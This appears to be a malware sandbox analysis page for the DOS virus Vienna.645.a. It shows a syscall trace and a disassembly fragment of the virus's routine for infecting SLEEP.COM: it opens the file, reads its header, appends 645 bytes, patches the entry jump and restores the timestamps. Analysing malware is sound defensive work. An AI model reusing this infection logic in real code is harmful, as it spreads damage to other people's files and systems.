Sample viewer

vx.netlux.org/Virus.DOS.Vienna.645.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:56:13.310972235Z 48 PC: 12a63 | Get DOS version
2018-12-17T21:56:13.313307821Z 47 PC: 12a6f | Get disk transfer address
2018-12-17T21:56:13.314412614Z 26 PC: 12a82 | Set disk transfer address
2018-12-17T21:56:13.315677845Z 78 PC: 12b0e | Find first file
2018-12-17T21:56:13.32200518Z 67 PC: 12b4c | Get or set file attributes
2018-12-17T21:56:13.327424491Z 67 PC: 12b5e | Get or set file attributes
2018-12-17T21:56:13.346095542Z 61 PC: 12b69 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:56:13.358095893Z 87 PC: 12b75 | Get or set file date and time
2018-12-17T21:56:13.359614263Z 44 PC: 12b81 | Get time 0x12b81: and dh, 7
0x12b84: jmp 0x12b96
0x12b86: mov ah, 0x40
0x12b88: mov cx, 5
0x12b8b: mov dx, si
0x12b8d: add dx, 0x8a
0x12b91: int 0x21
0x12b93: jmp 0x12bfa
0x12b95: nop
0x12b96: mov ah, 0x3f
0x12b98: mov cx, 3
0x12b9b: mov dx, 0xa
0x12b9e: nop
0x12b9f: add dx, si
0x12ba1: int 0x21
0x12ba3: jb 0x12bfa
0x12ba5: cmp ax, 3
0x12ba8: jne 0x12bfa
0x12baa: mov ax, 0x4202
0x12bad: mov cx, 0
2018-12-17T21:56:13.361752504Z 63 PC: 12ba3 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:13.36865104Z 66 PC: 12bb5 | Move file pointer
2018-12-17T21:56:13.370343311Z 64 PC: 12bd9 | Write file or device (Write 645 bytes on handle 5)
2018-12-17T21:56:13.378791912Z 66 PC: 12beb | Move file pointer
2018-12-17T21:56:13.380287113Z 64 PC: 12bfa | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:13.386830129Z 87 PC: 12c0d | Get or set file date and time
2018-12-17T21:56:13.388250275Z 62 PC: 12c11 | Close file
2018-12-17T21:56:13.395846012Z 67 PC: 12c20 | Get or set file attributes
2018-12-17T21:56:13.40565347Z 26 PC: 12c2d | Set disk transfer address